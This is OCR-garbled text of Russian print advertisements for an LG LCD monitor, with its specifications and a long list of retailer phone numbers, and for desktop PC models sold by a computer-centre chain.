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Во Властйкачества 

Яркое насыщенное изображение 

Жидкокристаллический монитор И7508ОІ-8М Ріаігоп 
Видимая область 17" (43. 1 8 см} /Точка 0.264 х 0.264 мм 
Яркость 250 кд/м2 - типичная /Контрастность 500: 1 - типичная 
Подсветка 4 лампы ССРІ /Угол обзора 1 60° по горизонтали, 1 60° по вертикали 
Время отклика 8 мс /Глубина цвета 16.2 млн. цветов 
Соответствие стандартам ТОО' 03 /Разрешение 1280х1024@75 Гц 



Информационная служба 16 Еіесігопісз В-800-200-76-76 (бесплатная горячая линия по Росии} ѵѵѵм.Ід.пі 





ѴѴѴѴѴѴ.ОѴСОМР.ѴШ 



Москва; Ргопеі Опнф (495)789 33 46. Москва; Неоторг (495)223 23 23, Москва: розничная сеть Роіапь (495) 755 55 57, Москва: Ф Центр [4951' 472 64 01, 
Москва: N1 Сопіриіег і495) 970-19-30,, Москва: Тешнма (495) 777 -87 -77 .Москва: Компами Кит (495) 777-66-55, Москва: ЯІаке 1495} 236-99-25, Москва: 
ЛБ групп (495) 745 5175, Москва: Сетевая Лаборатория (495 ) 754 64 90, Москва: І5М (495) 715 40 29, Москва: Никс (495) 974 33 33, Москва: ОПДИ 
(495)105-07-09, Москва: ІІ5М Сотрніегб (495) 221 -72-97, Москва: Старт Мастер (495) 935-38-52 г Москва: Акентек (495) 784 72-24, Москва: Эльдорадо 
(495) 500 № 00. Москва: Кибертрониха (495) 594 25 31 .Москва: Днлайн (495) 959 22 22, Москва: II ИВА СотрнШгз 1495) 775 75 66, 729 52 55, Гомель: 
ДЕЛ (495)250 -55- 36. Перьм: Га ежом (3422} 36-37-75, Волгоград: Вопгоірадпромграмситема (9442) 90 30-30. Москва: Алмер (495) 191-39-25, Москва: 
Микросет (495) 924 27 47, Москва; Гипермаркет Санрайз Про (495) 542 59 70, Санкт Петербург; ДВМ Нева (512) 325 1 1 05, Нижневартовск: Ланкорд 
(3466) 6 1 22 22. Краснодар: Иманго- Краснодар (861 ) 255 1 -552 г 25 Ш-915, Новосибирск: Квеста (38322)332-407, Новосибирск: Арснсшек(ЗВЗ) 22 1 16-89, 
В<шосрад:Тохкоад (5442)97 59 37, Нижний Новгород; АйТнОм 15312) 74 Ѳ5 ЗЭДюмонь: ДОнэкс Техника (3452)39 00 36, Электросталь; Дрмшехника (257) 
2 148В, Иркутск: Комгек (3952) 258Э38,, Иркутск: Билайн (3952) 24-00 -24,Красноярск: Альдо (3912} 21 I I -45 .Липецк: Регард Тур 10742) 48-45-73, Воронеж: 
Сами (0732) 54 00 00, Воронеж: Рег (0732) 77 93 39, Томск: Стек (3322) 55 71 43. Рязань: ДБ К (091 2) 90 90 00, Гомель: Компьютер Маркет 
(0232) 48- І0-48 г Тіомень: Торсовый дом -Весы* (3452)75-00-00,0рен6ург: Гермес-Телеком (3532)536 -565, Омск: Технопарк (3812)57 93-1 9Ліьк*етьеаск: 
Компьютерный мнр(В553) 25 9В 45, Воронеж: РИАН (4732)512 412, Лабытнанги: КЦ Ямал [34992)51 777, Ижевск: ЭЛ МИ( 34 12) 50-50 50 н Омск: Лик 2099 
(3812) 229-709 

"Дина Виктория" официальный дистрибьютор мониторов компании Ід еіесігопіев на территории РФ 
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Модель АдеМТ 
6400/200 

Іпі:еГ Соге’^ Рио 6400; 
Ш4МЬ00Й2(5Ш2); 
20ОеЬША;ОѴОЩ 
беРогсе 7600СТ 256 МЬ; 
8-сІіаппеІ лисіт; 
картридер. 



ЕішШТ 

Модель ЕІетеЫТ 
2x2800/80 

Іпгеі’ РетіштГ 0 820 
( 2 x 2800 МГц); 
51 2МЬ й0Л2 (256x2); 
80СЬ 5 АТА; 0ШИ; 
СеРога71О0СТ25бМЬ; 
6-сНэппеІ аигііо; 
картридер. 



роь^тг 



8 - 800 - 2000 - 7^7 

звонок бесплатный I V I 



ФЕДЕРАЛЬНАЯ СЕТЬ КОМПЬЮТЕРНЫХ ЦЕНТРОВ 
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